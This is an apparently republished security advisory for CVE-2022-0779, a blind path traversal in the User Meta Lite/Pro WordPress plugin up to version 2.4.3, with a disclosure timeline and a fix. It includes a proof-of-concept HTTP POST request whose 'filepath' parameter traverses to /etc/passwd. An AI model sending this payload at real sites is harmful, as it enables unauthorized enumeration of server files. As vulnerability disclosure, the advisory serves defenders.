Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress User Meta Lite / Pro 2.4.3 Path Traversal

WordPress User Meta Lite and Pro plugin versions 2.4.3 and below suffer from a path traversal vulnerability.

Packet Storm
#vulnerability#web#git#wordpress#php#perl#acer#auth

RCE Security Advisory
https://www.rcesecurity.com

  1. ADVISORY INFORMATION
    =======================
    Product: User Meta
    Vendor URL: https://wordpress.org/plugins/user-meta
    Type: Relative Path Traversal [CWE-23]
    Date found: 2022-02-28
    Date published: 2022-05-24
    CVSSv3 Score: 4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)
    CVE: CVE-2022-0779

  2. CREDITS
    ==========
    This vulnerability was discovered and researched by Julien Ahrens from
    RCE Security.

  3. VERSIONS AFFECTED
    ====================
    User Meta Lite 2.4.3 and below
    User Meta Pro 2.4.3 and below

  4. INTRODUCTION
    ===============
    An easy-to-use user profile and management plugin for WordPress that allows
    user login, reset-password, profile update and user registration with extra
    fields, all on front-end and many more. User Meta Pro is a versatile user
    profile builder and user management plugin for WordPress that has the most
    features on the market. User Meta aims to be your only go to plugin for
    user management.

(from the vendor’s homepage)

  1. VULNERABILITY DETAILS
    ========================
    The WordPress ajax action “um_show_uploaded_file” is vulnerable to an
    authenticated path traversal when user-supplied input to the HTTP POST
    parameter “filepath” is processed by the web application. Since the application
    does not properly validate and sanitize this parameter, it is possible to
    enumerate local server files using a blind approach. This is because the
    application doesn’t return the contents of the referenced file but instead
    returns different form elements based on whether a file exists or not.

The following Proof-of-Concept triggers this vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 147
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [your-wordpress-auth-cookies]
Connection: close

field_name=[your-field-name]&filepath=/…/…/…/…/…/etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true

  1. RISK
    =======
    The vulnerability can be used by an authenticated attacker to enumerate
    local server files based on a blind approach.

  2. SOLUTION
    ===========
    Update to User Meta/User Meta Pro 2.4.4

  3. REPORT TIMELINE
    ==================
    2022-02-28: Discovery of the vulnerability
    2022-02-28: WPScan (CNA) assigns CVE-2022-0779
    2022-03-03: Contacted the vendor via their contact form
    2022-03-06: Vendor response, acknowledgement of the issue
    2022-03-18: Version 2.4.2 is released
    2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.
    2022-04-13: No response, contacted vendor again
    2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.
    2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.
    2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine
    2022-05-16: Fix seems to work
    2022-05-24: Public disclosure

  4. REFERENCES
    =============
    https://github.com/MrTuxracer/advisories

Related news

CVE-2022-0779

The User Meta WordPress plugin before 2.4.4 does not validate the filepath parameter of its um_show_uploaded_file AJAX action, which could allow low privileged users such as subscriber to enumerate the local files on the web server via path traversal payloads

Packet Storm: Latest News

Ubuntu Security Notice USN-7089-6